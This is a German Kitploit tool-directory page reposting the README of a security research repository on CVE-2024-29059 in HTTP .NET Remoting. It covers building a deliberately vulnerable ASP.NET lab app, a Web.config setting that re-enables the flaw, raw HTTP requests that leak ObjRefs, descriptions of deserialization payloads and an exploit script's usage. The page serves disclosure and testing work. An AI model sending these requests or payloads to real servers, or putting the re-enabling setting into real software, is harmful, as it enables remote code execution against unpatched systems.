Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
HttpRemotingObjRefLeak — Zusätzliche Ressourcen zum Leaken und Ausnutzen von ObjRefs via HTTP .NET Remoting (CVE-2024-29059) | Kitploit
Tools/GitHubGitHub/codewhitesec/httpremotingobjrefleak
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubcodewhitesec/httpremotingobjrefleak

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

HttpRemotingObjRefLeak

Zusätzliche Ressourcen zum Leaken und Ausnutzen von ObjRefs via HTTP .NET Remoting (CVE-2024-29059)

Repository anzeigenWebseite
9214vor 2 JahrenVon Kitploit geprüft

Leaken und Ausnutzen von ObjRefs über HTTP .NET Remoting (CVE-2024-29059)

Dieses Repository enthält weitere Details und Ressourcen zum CODE WHITE Blogpost gleichen Namens Leaking ObjRefs to Exploit HTTP .NET Remoting:

  1. Erstellen einer angreifbaren ASP.NET-Webanwendung
  2. Erkennen von ObjRef-Leaks
  3. Beispiel-Deserialisierungs-Payloads, die unter den TypeFilterLevel.Low-Einschränkungen funktionieren
  4. Exploit-Skript zum Ausliefern der Payloads

1. Erstellen einer angreifbaren ASP.NET-Webanwendung

Das Folgende basiert auf Configure Application Insights for your ASP.NET website von Microsoft und beschreibt, wie man mit Visual Studio 2019 (erforderlich, um .NET Framework 4.5.2 zu targetieren, Sie können es noch herunterladen unter https://aka.ms/vs/16/release/vs_community.exe) und Microsoft Application Insights eine angreifbare ASP.NET-Webanwendung erstellt:

  1. Öffnen Sie Visual Studio 2019.
  2. Wählen Sie Datei > Neu > Projekt.
  3. Wählen Sie ASP.NET-Webanwendung (.NET Framework) C# und dann Weiter.
  4. Wählen Sie .NET Framework 4.5.2 und dann Erstellen.
  5. Wählen Sie Leer und dann Erstellen.
  6. Wählen Sie Projekt > Application Insights Telemetrie hinzufügen.
  7. Wählen Sie Application Insights SDK (lokal) und dann Weiter.
  8. Aktivieren Sie NuGet-Pakete und klicken Sie dann auf Fertigstellen.

Wenn die .NET Framework-Updates vom Januar 2024 installiert sind, öffnen Sie die Web.config-Datei und fügen Sie Folgendes unter /configuration/appSettings hinzu, um das angreifbare Verhalten wieder zu aktivieren:

root@kitploit:~
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />

Sie können die Webanwendung dann über Debuggen > Ohne Debuggen starten oder durch Drücken von Strg+F5 ausführen.

2. Erkennen von ObjRef-Leaks

Sie können die folgenden Anfragen verwenden, um ObjRefs von MarshalByRefObject-Instanzen, die im LogicalCallContext gespeichert sind, zu leaken:

  • BinaryServerFormatterSink:

    root@kitploit:~
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: application/octet-stream
    
  • SoapServerFormatterSink:

    root@kitploit:~
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: text/xml
    

Geleakte ObjRef-URIs können dann mit dem folgenden Regex abgeglichen werden:

root@kitploit:~
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem

3. Beispiel-Deserialisierungs-Payloads

Wir haben zwei einfache Deserialisierungs-Payloads basierend auf dem TextFormattingRunProperties-Gadget von YSoSerial.Net mit benutzerdefinierten XAML-Payloads erstellt, die unter den durch TypeFilterLevel.Low verursachten Einschränkungen funktionieren, um Folgendes durchzuführen:

  • HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")
  • HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"

Die HTTP-Header können in der Antwort des Servers auf die HTTP .NET Remoting-Anfrage beobachtet werden.

4. Exploit-Skript

Das Skript RemoteApplicationMetadata.py bietet eine Möglichkeit, bestehende ObjRefs zu leaken und diese dann in einer nachfolgenden Anfrage zu verwenden, um einen gegebenen Payload auszuliefern:

root@kitploit:~
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]

positional arguments:
  url                   target URL (without `RemoteApplicationMetadata.rem`)
  file                  BinaryFormatter/SoapFormatter payload file (default: stdin)

options:
  -h, --help            show this help message and exit
  -c, --chunked         use chunked Transfer-Encoding for request
  --chunk-range CHUNK_RANGE
                        range to pick the chunk size from randomly, e. g., 1-10
  -e, --encoding        apply a random non ASCII-based encoding on SOAP
  -f {binary,soap}, --format {binary,soap}
                        targeted runtime serializer format (default: soap)
  -u, --use-generic-uri
                        use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
  -v, --verbose         print verbose info

Beispiel:

root@kitploit:~
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
Tool herunterladen